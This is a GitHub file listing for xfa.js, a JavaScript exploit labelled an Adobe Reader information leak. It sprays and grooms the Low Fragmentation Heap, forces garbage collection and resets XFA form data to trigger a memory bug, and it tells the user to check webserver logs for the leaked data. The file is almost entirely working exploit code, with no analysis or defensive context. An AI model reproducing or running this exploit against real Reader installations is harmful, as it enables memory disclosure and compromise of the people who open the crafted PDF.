-
Notifications
You must be signed in to change notification settings - Fork 10
/
xfa.js
66 lines (47 loc) · 1.19 KB
/
xfa.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/**
* Adobe Reader Information Leak Exploit
*/
var chunks = [];
const groomLFH = (size, count) => {
var string = unescape("%u4142").repeat(size);
for (var i = 0; i < count; i++) {
chunks.push(string.substr(0, (size - 2) / 2).toUpperCase());
}
for (var i = 0; i < chunks.length; i += 4) {
chunks[i] = null;
delete chunks[i];
}
};
const triggerGC = () => {
var string = "GC".repeat(0x100000);
for (var i = 0; i < 1000; i++) {
string.substr(0, 0x100000);
}
};
const exploit = () => {
xfa.isPropertySpecified("[+] Starting Adobe Reader information leak exploit");
//
// Groom the heap
//
xfa.isPropertySpecified("[+] Grooming LFH");
groomLFH(0x58, 30000);
//
// Trigger garbage collection
//
xfa.isPropertySpecified("[+] Triggering Garbage Collection");
triggerGC();
//
// Reset XFA data which is essential to trigger the bug
//
xfa.isPropertySpecified("[+] Resetting XFA data");
xfa.host.resetData();
xfa.isPropertySpecified("[+] Now click on the form and check webserver logs");
};
//
// Trigger the exploit
//
try {
exploit();
} catch (e) {
app.alert(e);
}